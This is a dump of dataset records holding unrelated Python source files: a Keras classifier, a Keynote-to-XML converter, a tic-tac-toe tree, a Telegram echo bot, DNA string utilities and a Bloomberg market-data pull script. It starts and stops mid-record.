{}'.format(self._model_server.model_name, self._model_server.system_name))\n\n def __enter__(self):\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n self.close()\n\n def __del__(self):\n self.close()\n\n def close(self):\n self._model_server.close()\n\n def forward(self, observation=None):\n return self._model_server.forward(observation)\n","sub_path":"pyprob/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":22050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"421404776","text":"from keras import Input, Model\n\n#from keras.applications.xception import Xception\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nimport efficientnet.keras as efn\n\n\nfrom keras.layers import Flatten, Dense, Dropout\nfrom keras.layers import GlobalAveragePooling2D, BatchNormalization\nfrom os import path\n\n\ndef frozen_networks(input_size, n_classes, local_weights=None):\n if local_weights and path.exists(local_weights):\n print(f'Using {local_weights} as local weights.')\n model_ = efn.EfficientNetB5(\n include_top=False,#fine tuning을 위한 false\n input_tensor=Input(shape=input_size),\n weights=local_weights)\n else:\n print(\n f'Could not find local weights {local_weights} for Model. Using remote weights.')\n model_ = efn.EfficientNetB5(\n include_top=False,\n input_tensor=Input(shape=input_size),\n weights='noisy-student')\n\n for layer in model_.layers:\n layer.trainable = False#불러온 모델의 웨이트를 학습하지 않도록 설정\n x = GlobalAveragePooling2D()(model_.layers[-1].output)\n #x = BatchNormalization()(x)\n x = Dense(n_classes, activation='softmax')(x)\n frozen_model = Model(model_.input, x)\n\n #frozen_model.summary()#모델구조 출력\n return frozen_model","sub_path":"spam/spam/spam_classifier/networks/STNetworks.py","file_name":"STNetworks.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"113282795","text":"import appscript\nimport shutil, os, sys\nimport itertools\nfrom contextlib import closing\nimport lxml.etree as ET\n\nfilepath = \"demo.key\" # sys.argv[1]\nkeynote = appscript.app('Keynote')\nkeynote_file = appscript.mactypes.File(filepath)\n\nwith closing(keynote.open(keynote_file)) as doc:\n notes = doc.slides.presenter_notes()\n skipped = doc.slides.skipped()\n notes = list(itertools.compress(notes, [not s for s in skipped]))\n\n texts = []\n hotwords = []\n for note in notes:\n lines = note.strip().splitlines()\n\n text = r\"\\n\".join(lines[:-1])\n texts.append(text)\n\n assert lines[-1].startswith(':')\n hotword = lines[-1].lstrip(':').strip()\n hotwords.append(hotword)\n\nresources = ET.Element(\"resources\")\nET.SubElement(resources, \"integer\", name=\"nslides\").text = str(len(notes))\ntexts_ = ET.SubElement(resources, \"string-array\", name=\"texts\")\nfor text in texts:\n ET.SubElement(texts_, \"item\").text = text\nhotwords_ = ET.SubElement(resources, \"string-array\", name=\"hotwords\")\nfor hotword in hotwords:\n ET.SubElement(hotwords_, \"item\").text = hotword\ntree = ET.ElementTree(resources)\ntree.write(\"keynote.xml\", pretty_print=True)\n","sub_path":"keynote2xml.py","file_name":"keynote2xml.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"60712848","text":"from btnode import BTNode\n\n\nclass BTree:\n \"\"\"Represent a binary tree\"\"\"\n\n def __init__(self, root=None):\n self.root = root\n\n def expand(self, node, value):\n \"\"\"Expand a binary tree of all states in Tic-tac-toe\"\"\"\n board = node.data\n if board.isFull():\n return None\n node.left = BTNode(board.make_random_move(value))\n node.right = BTNode(board.make_random_move(value))\n if node.left.data.get_winner() == 0:\n self.expand(node.left, -value)\n if node.right.data.get_winner() == 0:\n self.expand(node.right, -value)\n\n def compute_value(self, node):\n \"\"\"Compute number of victories of AI\"\"\"\n if node.data.get_winner():\n return node.data.get_winner() * 100\n if node.data.isFull():\n return -50\n return self.compute_value(node.left) + self.compute_value(node.right)\n\n def get_best_move(self):\n \"\"\"Computes a best move. For this it computes number \n of victories of AI in each of moves that AI can make.\"\"\"\n if self.compute_value(self.root.left) < self.compute_value(self.root.right):\n return self.root.left.data\n else:\n return self.root.right.data\n","sub_path":"binary_tree/btree.py","file_name":"btree.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"71427648","text":"import sys\nimport os \nimport os.path\nimport readInput\nfrom os.path import join as pj\n\ndef write_surfrend_script(conname,connum, swd, thresh, exthresh):\n \"\"\"\n Writes out the m file with matlab calls to surfrend_canonical.m.\n \"\"\"\n mfile_script = pj(swd, conname+\".m\")\n commands = []\n commands.append(\"warning off all\")\n mlab_cmd = \"surfrend_canonical\"\n commands.append(\"%s('%s', %s, '%s', %s, %s)\" % (mlab_cmd, conname, connum, swd, thresh, exthresh))\n commands.append('exit;')\n write_file_with_list(mfile_script, commands, conname, swd)\n\n\ndef write_file_with_list(path,lines,conname,swd,quiet=False):\n \"\"\"\n File writing\n \"\"\"\n try:\n with open(path,'w') as f:\n text = '\\n'.join(lines)\n f.write(text + '\\n')\n # make_lingua(path)\n if not quiet:\n print(\"Hi! Wrote %s/%s.m\" % (swd,conname))\n except IOError:\n raise\n\n\n\nif __name__ == \"__main__\":\n write_surfrend_script(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])\n","sub_path":"write_surfrend_script.py","file_name":"write_surfrend_script.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"591420169","text":"from telegram_api.telegram_bot import TelegramBot\n\n\nclass TelegramBotImpl(TelegramBot):\n def __init__(self, bot_name, access_token):\n super(TelegramBotImpl, self).__init__(bot_name, access_token)\n\n def handler(self, msg):\n content_type, chat_type, chat_id = TelegramBot.glance(msg)\n message = msg['text']\n\n if content_type == 'text':\n self.bot.sendMessage(chat_id, message)\n else:\n self.bot.sendMessage(chat_id, 'Ese tipo de message no es valido')\n","sub_path":"example_echo_bot/telegram_bot_impl.py","file_name":"telegram_bot_impl.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"409712080","text":"# Author : Adrian Carlos A. de Vera\n# CMSC 128 Programming Assignment 2\n# March 12, 2016\n\n# returns the number of times str1 and str2 differ in character in the same place.\ndef getHammingDistance(str1, str2):\n\tif len(str1) <= 0 or len(str2) <= 0:\n\t\treturn \"Error! Strings have invalid length.\"\n\n\tif \tlen(str1) != len(str2):\n\t\treturn \"Error! Strings are not equal.\"\n\t\n\tdist = 0\n\n\tfor i in range (len(str1)):\n\t\tif str1[i] != str2[i]:\n\t\t\tdist += 1\n\n\treturn dist\n\n# returns the number of times the string pattern appears in the string\n# original\ndef countSubstrPattern(original, pattern):\n\tnum = 0\n\tfor i in range (len(original)):\n\t\tif original[i:i + len(pattern)] == pattern:\n\t\t\tnum += 1\n\treturn num\n\n# returns True if all characters in the string is in the set of letters\ndef isValidString(string, letters):\n\tfor i in range (len(string)):\n\t\tfor j in range (len(letters)):\n\t\t\tif string[i] == letters[j]:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tif j == len(letters) - 1:\n\t\t\t\t\treturn False\t\n\treturn True\n\n# returns the number of G minus the number of C in a string up to its nth letter\ndef getSkew(string, n):\n\tnumG = 0\n\tnumC = 0\n\n\tif n <= 0:\n\t\treturn \"Error! Invalid Skew number.\"\n\telse:\n\t\tfor i in range(n):\n\t\t\tif string[i] == \"G\": \n\t\t\t\tnumG += 1\n\t\t\telif string[i] == \"C\":\n\t\t\t\tnumC += 1\n\n\treturn numG - numC\n\n# returns the maximum number of G minus the number of C in a string up to its nth letter\ndef getMaxSkewN(string, n):\n\tnumG = 0\n\tnumC = 0\n\tval = 0\n\tif n <= 0:\n\t\treturn \"Error! Invalid Skew number.\"\n\telse:\n\t\tfor i in range(n):\n\t\t\tif string[i] == \"G\": \n\t\t\t\tnumG += 1\n\t\t\telif string[i] == \"C\":\t\n\t\t\t\tnumC += 1\t\t\n\t\t\tval = val if val > (numG - numC) else (numG - numC)\n\n\treturn val\n\n# returns the minimum number of G minus the number of C in a string up to its nth letter\ndef getMinSkewN(string, n):\n\tnumG = 0\n\tnumC = 0\n\tval = 1\n\tif n <= 0:\n\t\treturn \"Error! Invalid Skew number.\"\n\telse:\n\t\tfor i in range(n):\n\t\t\tif string[i] == \"G\": \n\t\t\t\tnumG += 1\n\t\t\telif string[i] == \"C\":\n\t\t\t\tnumC += 1\n\t\t\tval = val if val < (numG - numC) else (numG - numC)\n\t\t\t\n\treturn val","sub_path":"deVeraSBL.py","file_name":"deVeraSBL.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"630519172","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:percent\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.2'\n# jupytext_version: 1.2.4\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# %%\nimport cma_gui as cma\nimport pandas as pd\n\nfrom datetime import date\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom xbbg import blp\n\n# %% [markdown]\n# # As of Date\n\n# %%\n# Date range for Bloomberg data pulls\nend_date = cma.end_date\nend_date_str = end_date.strftime('%m-%d-%Y')\n\nstart_date = end_date - relativedelta(years=30)\nstart_date_str = start_date.strftime('%m-%d-%Y')\n\n# %% [markdown]\n# # Equity Data\n\n# %% [markdown]\n# ## USD\n\n# %%\n# Bloomberg code to pull gross of dividend return values\ndata_return = ['DAY_TO_DAY_TOT_RETURN_GROSS_DVDS']\n\n# %%\nequity_name_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_us_name' in k}.values())))\nequity_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_us_code' in k}.values())))\nequity_dictionary = dict(zip(equity_list, equity_name_list))\n\n# %%\nequity_returns = blp.bdh(tickers=equity_list, flds=data_return, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nequity_returns.columns = equity_returns.columns.droplevel(1)\nequity_returns.columns = equity_returns.columns.map(equity_dictionary)\n\n# Convert index to datetime\nequity_returns.index = pd.to_datetime(equity_returns.index)\n\n# Adjust dataframe for varying month end dates\nequity_returns = equity_returns.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ## Non-USD\n\n# %%\n# Bloomberg code to pull index values\ndata_return_nonus = ['PX_LAST']\n\n# %%\n# Reference for future renaming of columns\nequity_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_nonus_code' in k}.values())))\nequity_name_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_nonus_name' in k}.values())))\nequity_dictionary_nonus = dict(zip(equity_list_nonus, equity_name_list_nonus))\n\n# %%\nequity_returns_nonus = blp.bdh(tickers=equity_list_nonus, flds=data_return_nonus, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nequity_returns_nonus.columns = equity_returns_nonus.columns.droplevel(1)\nequity_returns_nonus.columns = equity_returns_nonus.columns.map(equity_dictionary_nonus)\n\n# Convert index to datetime\nequity_returns_nonus.index = pd.to_datetime(equity_returns_nonus.index)\n\n# Adjust dataframe for varying month end dates\nequity_returns_nonus = equity_returns_nonus.resample('M', axis=0).mean()\nequity_returns_nonus = equity_returns_nonus.reindex(columns=equity_name_list_nonus)\n\n# %% [markdown]\n# # Fixed Income Data\n\n# %% [markdown]\n# ## USD - Fixed\n\n# %%\n# Reference for future renaming of columns\nfixed_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_us_code' in k}.values())))\nfixed_name_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_us_name' in k}.values())))\nfixed_dictionary = dict(zip(fixed_list, fixed_name_list))\n\n# %% [markdown]\n# ### USD Fixed Returns\n\n# %%\nfixed_returns = blp.bdh(tickers=fixed_list, flds=data_return, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_returns.columns = fixed_returns.columns.droplevel(1)\nfixed_returns.columns = fixed_returns.columns.map(fixed_dictionary)\n\n# Convert index to datetime\nfixed_returns.index= pd.to_datetime(fixed_returns.index)\n\n# Adjust dataframe for varying month end dates\nfixed_returns = fixed_returns.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ### USD Fixed Yields\n\n# %%\nfixed_yields = blp.bdh(tickers=fixed_list, flds='YIELD_TO_WORST', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_yields.columns = fixed_yields.columns.droplevel(1)\nfixed_yields.columns = fixed_yields.columns.map(fixed_dictionary)\n\n# Convert index to datetime\nfixed_yields.index = pd.to_datetime(fixed_yields.index)\n\n# Adjust dataframe for varying month end dates\nfixed_yields = fixed_yields.resample('M', axis=0).mean()\n\n# %%\n# Add bank loan yields\nbank_loan_yield = blp.bdh(tickers='SPBDLLY Index', flds='PX_LAST', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nbank_loan_yield.columns = bank_loan_yield.columns.droplevel(1)\n\n# Adjust dataframes for varying month end dates\nbank_loan_yield = bank_loan_yield.resample('M', axis=0).mean()\n\n# %%\n# Combine with other yield results\nfixed_yields['U.S. Bank Loans'] = bank_loan_yield\n\n# %% [markdown]\n# ### USD Fixed Spreads\n\n# %%\nfixed_spreads = blp.bdh(tickers=fixed_list, flds='INDEX_OAS_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_spreads.columns = fixed_spreads.columns.droplevel(1)\nfixed_spreads.columns = fixed_spreads.columns.map(fixed_dictionary)\n\n# Fill for indices with no spread\nfixed_spreads['U.S. TIPS'] = 0\nfixed_spreads['U.S. Intermediate Municipal'] = 0\nfixed_spreads['U.S. Short Municipal'] = 0\n\n# Convert index to datetime\nfixed_spreads.index = pd.to_datetime(fixed_spreads.index)\n\n# Adjust dataframe for varying month end dates\nfixed_spreads = fixed_spreads.resample('M', axis=0).mean()\n\n# Add bank loan spread estimate\nfixed_spreads['U.S. Bank Loans'] = fixed_yields['U.S. Bank Loans'] - fixed_yields['U.S. Treasury Bills']\n\n# %% [markdown]\n# ### USD Fixed Duration\n\n# %%\nfixed_durations = blp.bdh(tickers=fixed_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\ntips_duration = blp.bdh(tickers='BCIT1T Index', flds='MODIFIED_DURATION', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_durations.columns = fixed_durations.columns.droplevel(1)\nfixed_durations.columns = fixed_durations.columns.map(fixed_dictionary)\n\n# Add constant for bank loan spreads\nfixed_durations['U.S. Bank Loans'] = 0.25\nfixed_durations['U.S. TIPS'] = tips_duration\n\n# Convert index to datetime\nfixed_durations.index = pd.to_datetime(fixed_durations.index)\n\n# Adjust dataframe for varying month end dates\nfixed_durations = fixed_durations.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ## Non USD - Fixed\n\n# %%\n# Reference for future renaming of columns\nfixed_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_nonus_code' in k}.values())))\nfixed_name_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_nonus_name' in k}.values())))\nfixed_dictionary_nonus = dict(zip(fixed_list_nonus, fixed_name_list_nonus))\n\n# %% [markdown]\n# ### Non-USD Fixed Returns\n\n# %%\nfixed_returns_nonus = blp.bdh(tickers=fixed_list_nonus, flds=data_return_nonus, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_returns_nonus.columns = fixed_returns_nonus.columns.droplevel(1)\nfixed_returns_nonus.columns = fixed_returns_nonus.columns.map(fixed_dictionary_nonus)\n\n# Convert index to datetime\nfixed_returns_nonus.index= pd.to_datetime(fixed_returns_nonus.index)\n\n# Adjust dataframe for varying month end dates\nfixed_returns_nonus = fixed_returns_nonus.resample('M', axis=0).mean()\nfixed_returns_nonus = fixed_returns_nonus.reindex(columns=fixed_name_list_nonus)\n\n# %% [markdown]\n# ### Non-USD Fixed Yields\n\n# %%\nfixed_yields_nonus = blp.bdh(tickers=fixed_list_nonus, flds='YIELD_TO_WORST', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_yields_nonus.columns = fixed_yields_nonus.columns.droplevel(1)\nfixed_yields_nonus.columns = fixed_yields_nonus.columns.map(fixed_dictionary_nonus)\n\n# Convert index to datetime\nfixed_yields_nonus.index = pd.to_datetime(fixed_yields_nonus.index)\n\n# Adjust dataframe for varying month end dates\nfixed_yields_nonus = fixed_yields_nonus.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ### Non-USD Fixed Spreads\n\n# %%\nfixed_spreads_nonus = blp.bdh(tickers=fixed_list_nonus, flds='INDEX_OAS_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_spreads_nonus.columns = fixed_spreads_nonus.columns.droplevel(1)\nfixed_spreads_nonus.columns = fixed_spreads_nonus.columns.map(fixed_dictionary_nonus)\n\n# Convert index to datetime\nfixed_spreads_nonus.index = pd.to_datetime(fixed_spreads_nonus.index)\n\n# Adjust dataframe for varying month end dates\nfixed_spreads_nonus = fixed_spreads_nonus.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ### Non-USD Fixed Duration\n\n# %%\nfixed_durations_nonus = blp.bdh(tickers=fixed_list_nonus, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_durations_nonus.columns = fixed_durations_nonus.columns.droplevel(1)\nfixed_durations_nonus.columns = fixed_durations_nonus.columns.map(fixed_dictionary_nonus)\n\n# Convert index to datetime\nfixed_durations_nonus.index = pd.to_datetime(fixed_durations_nonus.index)\n\n# Adjust dataframe for varying month end dates\nfixed_durations_nonus = fixed_durations_nonus.resample('M', axis=0).mean()\n\n# %% [markdown]\n# # Treasury Data\n\n# %% [markdown]\n# ## US Treasury Data\n\n# %%\ntreasury_list = ['I00087 Index', 'BTB5STAT Index', 'BW10STAT Index', 'BW30STAT Index']\ntreasury_dictionary = {'I00087 Index': '3 Mo', 'BTB5STAT Index': '5 Yr', 'BW10STAT Index': '10 Yr', 'BW30STAT Index': '30 Yr'}\n\n# %%\n# Treasury Yields\nfixed_treasury_yld = blp.bdh(tickers=treasury_list, flds='INDEX_YIELD_TO_MATURITY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_treasury_yld.columns = fixed_treasury_yld.columns.droplevel(1)\nfixed_treasury_yld.columns = fixed_treasury_yld.columns.map(treasury_dictionary)\n\n# %%\n# Treasury Duration\nfixed_treasury_dur = blp.bdh(tickers=treasury_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_treasury_dur.columns = fixed_treasury_dur.columns.droplevel(1)\nfixed_treasury_dur.columns = fixed_treasury_dur.columns.map(treasury_dictionary)\n\n# %% [markdown]\n# ## Global Treasury Data\n\n# %%\ngl_treasury_list = ['LGY3TRUU Index', 'I04790 Index', 'LG7YSTAT Index', 'LGY7TRUU Index','LGY1TRUU Index']\ngl_treasury_dictionary = {'LGY3TRUU Index': '1-3 Yr', 'I04790 Index': '3-5 Yr', 'LG7YSTAT Index': '5-7 Yr', \n 'LGY7TRUU Index': '7-10 Yr','LGY1TRUU Index': '10+ Yr'} \n\n# %%\n# Gl Treasury Yields\ngl_fixed_treasury_yld = blp.bdh(tickers=gl_treasury_list, flds='INDEX_YIELD_TO_MATURITY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_treasury_yld.columns = gl_fixed_treasury_yld.columns.droplevel(1)\ngl_fixed_treasury_yld.columns = gl_fixed_treasury_yld.columns.map(gl_treasury_dictionary)\n\n# %%\n# Gl Treasury Durations\ngl_fixed_treasury_dur = blp.bdh(tickers=gl_treasury_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_treasury_dur.columns = gl_fixed_treasury_dur.columns.droplevel(1)\ngl_fixed_treasury_dur.columns = gl_fixed_treasury_dur.columns.map(gl_treasury_dictionary)\n\n# %% [markdown]\n# ## Global Agg Data\n\n# %%\ngl_agg_list = ['H16607US Index', 'H16608US Index', 'H16609US Index', 'H16610US Index','H16611US Index']\ngl_agg_dictionary = {'H16607US Index': '1-3 Yr', 'H16608US Index': '3-5 Yr', 'H16609US Index': '5-7 Yr', \n 'H16610US Index': '7-10 Yr','H16611US Index': '10+ Yr'} \n\n# %%\n# Gl Treasury Yields\ngl_fixed_agg_yld = blp.bdh(tickers=gl_agg_list, flds='INDEX_YIELD_TO_MATURITY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_agg_yld.columns = gl_fixed_agg_yld.columns.droplevel(1)\ngl_fixed_agg_yld.columns = gl_fixed_agg_yld.columns.map(gl_agg_dictionary)\n\n# %%\n# Gl Treasury Durations\ngl_fixed_agg_dur = blp.bdh(tickers=gl_agg_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_agg_dur.columns = gl_fixed_agg_dur.columns.droplevel(1)\ngl_fixed_agg_dur.columns = gl_fixed_agg_dur.columns.map(gl_agg_dictionary)\n\n# %%\n# Gl Treasury Spreads\ngl_fixed_agg_spread = blp.bdh(tickers=gl_agg_list, flds='INDEX_OAS_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_agg_spread.columns = gl_fixed_agg_spread.columns.droplevel(1)\ngl_fixed_agg_spread.columns = gl_fixed_agg_spread.columns.map(gl_agg_dictionary)\n\n# %% [markdown]\n# ## EM Treasury Data\n\n# %%\nem_treasury_list = ['I22843US Index', 'I22844US Index', 'I22845US Index', 'I22846US Index', 'I22847US Index']\nem_treasury_dictionary = {'I22843US Index': '1-3 Yr', 'I22844US Index': '3-5 Yr', 'I22845US Index': '5-7 Yr', 'I22846US Index': '7-10 Yr','I22847US Index': '10+ Yr'} \n\n# %%\n# Treasury Yields\nem_fixed_treasury_yld = blp.bdh(tickers=em_treasury_list, flds='INDEX_YIELD_TO_MATURITY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nem_fixed_treasury_yld.columns = em_fixed_treasury_yld.columns.droplevel(1)\nem_fixed_treasury_yld.columns = em_fixed_treasury_yld.columns.map(em_treasury_dictionary)\n\n# %%\n# Treasury Duration\nem_fixed_treasury_dur = blp.bdh(tickers=em_treasury_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nem_fixed_treasury_dur.columns = em_fixed_treasury_dur.columns.droplevel(1)\nem_fixed_treasury_dur.columns = em_fixed_treasury_dur.columns.map(em_treasury_dictionary)\n\n# %% [markdown]\n# ## AA Corp Data (for Muni Calcs)\n\n# %%\naa_corp_list = ['I08219 Index']\naa_corp_dictionary = {'I08219 Index': 'AA Corp'}\n\n# %%\n# AA Corp Spreads\naa_corp_spread = blp.bdh(tickers=aa_corp_list, flds='INDEX_OAS_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\naa_corp_spread.columns = aa_corp_spread.columns.droplevel(1)\naa_corp_spread.columns = aa_corp_spread.columns.map(aa_corp_dictionary)\n\n# %% [markdown]\n# # Alts Data\n\n# %% [markdown]\n# ## USD - Alts\n\n# %%\n# Reference for future renaming of columns\nalts_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_us_code' in k}.values())))\nalts_name_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_us_name' in k}.values())))\nalts_dictionary = dict(zip(alts_list, alts_name_list))\n\n# %%\nalts_returns = blp.bdh(tickers=alts_list, flds=data_return, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nalts_returns.columns = alts_returns.columns.droplevel(1)\nalts_returns.columns = alts_returns.columns.map(alts_dictionary)\n\n# Convert index to datetime\nalts_returns.index = pd.to_datetime(alts_returns.index)\n\n# Adjust dataframe for varying month end dates\nalts_returns = alts_returns.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ## Non USD - Alts\n\n# %%\n# Reference for future renaming of columns\nalts_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_nonus_code' in k}.values())))\nalts_name_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_nonus_name' in k}.values())))\nalts_dictionary_nonus = dict(zip(alts_list_nonus, alts_name_list_nonus))\n\n# %%\nalts_returns_nonus = blp.bdh(tickers=alts_list_nonus, flds=data_return_nonus, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nalts_returns_nonus.columns = alts_returns_nonus.columns.droplevel(1)\nalts_returns_nonus.columns = alts_returns_nonus.columns.map(alts_dictionary_nonus)\n\n# Convert index to datetime\nalts_returns_nonus.index = pd.to_datetime(alts_returns_nonus.index)\n\n# Adjust dataframe for varying month end dates\nalts_returns_nonus = alts_returns_nonus.resample('M', axis=0).mean()\n\n# %% [markdown]\n# # Currency\n\n# %%\ncurrencies = ['AUD', 'CAD', 'CHF','DKK', 'EUR', 'GBP', 'JPY', 'NOK', 'NZD', 'SEK']\ncross_currencies = ['USD' + x +' Curncy' for x in currencies]\n\n# Change naming\ncross_currencies_dictionary = {}\nfor key in cross_currencies: \n for value in currencies: \n cross_currencies_dictionary[key] = value \n currencies.remove(value) \n break \n\n# %%\nhistorical_cross_currencies = blp.bdh(tickers=cross_currencies, flds='PX_LAST', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nhistorical_cross_currencies.columns = historical_cross_currencies.columns.droplevel(1)\nhistorical_cross_currencies.columns = historical_cross_currencies.columns.map(cross_currencies_dictionary)\n\n# Convert index to datetime\nhistorical_cross_currencies.index = pd.to_datetime(historical_cross_currencies.index)\n\n# Adjust dataframe for varying month end dates\nhistorical_cross_currencies = historical_cross_currencies.resample('M', axis=0).mean()\nhistorical_cross_currencies['USD'] = 1\n\n# %% [markdown]\n# # Beta Index Data\n\n# %%\nbeta_list = 'EMUSTRUU Index'\nbeta_dictionary = {'EMUSTRUU Index': 'Emerging Debt Agg USD'}\n\n# %%\nbeta_returns = blp.bdh(tickers=beta_list, flds=data_return_nonus, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nbeta_returns.columns = beta_returns.columns.droplevel(1)\nbeta_returns.columns = beta_returns.columns.map(beta_dictionary)\n\n# Convert index to datetime\nbeta_returns.index = pd.to_datetime(beta_returns.index)\n\n# Adjust dataframe for varying month end dates\nbeta_returns = beta_returns.resample('M', axis=0).mean()\n\n# %%\n# Add beta return needed to fixed non-us data\nfixed_returns_nonus = fixed_returns_nonus.join(beta_returns)\n\n# %% [markdown]\n# # Save Data to Excel\n\n# %%\nwith pd.ExcelWriter(r'P:\\\\Advisory\\\\Research\\\\Automation\\\\CMAs\\\\Data\\\\bloomberg_data_us.xlsx') as writer:\n equity_returns.to_excel(writer, sheet_name='equity_returns')\n fixed_returns.to_excel(writer, sheet_name='fixed_returns')\n fixed_yields.to_excel(writer, sheet_name='fixed_yields')\n fixed_spreads.to_excel(writer, sheet_name='fixed_spreads')\n fixed_durations.to_excel(writer, sheet_name='fixed_durations')\n alts_returns.to_excel(writer, sheet_name='alts_returns')\n\n# %%\nwith pd.ExcelWriter(r'P:\\\\Advisory\\\\Research\\\\Automation\\\\CMAs\\\\Data\\\\bloomberg_data_nonus.xlsx') as writer:\n equity_returns_nonus.to_excel(writer, sheet_name='equity_returns')\n fixed_returns_nonus.to_excel(writer, sheet_name='fixed_returns')\n fixed_yields_nonus.to_excel(writer, sheet_name='fixed_yields')\n fixed_spreads_nonus.to_excel(writer, sheet_name='fixed_spreads')\n fixed_durations_nonus.to_excel(writer, sheet_name='fixed_durations')\n alts_returns_nonus.to_excel(writer, sheet_name='alts_returns')\n historical_cross_currencies.to_excel(writer, sheet_name='currencies')\n\n# %%\nwith pd.ExcelWriter(r'P:\\\\Advisory\\\\Research\\\\Automation\\\\CMAs\\\\Data\\\\term_structure_data.xlsx') as writer:\n aa_corp_spread.to_excel(writer, sheet_name='aa_corp_spread')\n fixed_treasury_yld.to_excel(writer, sheet_name='us_treas_yld')\n fixed_treasury_dur.to_excel(writer, sheet_name='us_treas_dur')\n gl_fixed_treasury_yld.to_excel(writer, sheet_name='gl_treas_yld')\n gl_fixed_treasury_dur.to_excel(writer, sheet_name='gl_treas_dur') \n gl_fixed_agg_yld.to_excel(writer, sheet_name='gl_agg_yld')\n gl_fixed_agg_dur.to_excel(writer, sheet_name='gl_agg_dur')\n gl_fixed_agg_spread.to_excel(writer, sheet_name='gl_agg_spreads')\n em_fixed_treasury_yld.to_excel(writer, sheet_name='em_treas_yld')\n em_fixed_treasury_dur.to_excel(writer, sheet_name='em_treas_dur')\n\n# %%\n","sub_path":".ipynb_checkpoints/data_pull-checkpoint.py","file_name":"data_pull-checkpoint.py","file_ext":"py","file_size_in_byte":19613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"506743515","text":"#-*- coding:utf-8 -*-\nfrom flask import render_template,redirect,request,url_for,flash\nfrom flask_login import current_user,login_required\nfrom . import db\nfrom .models import 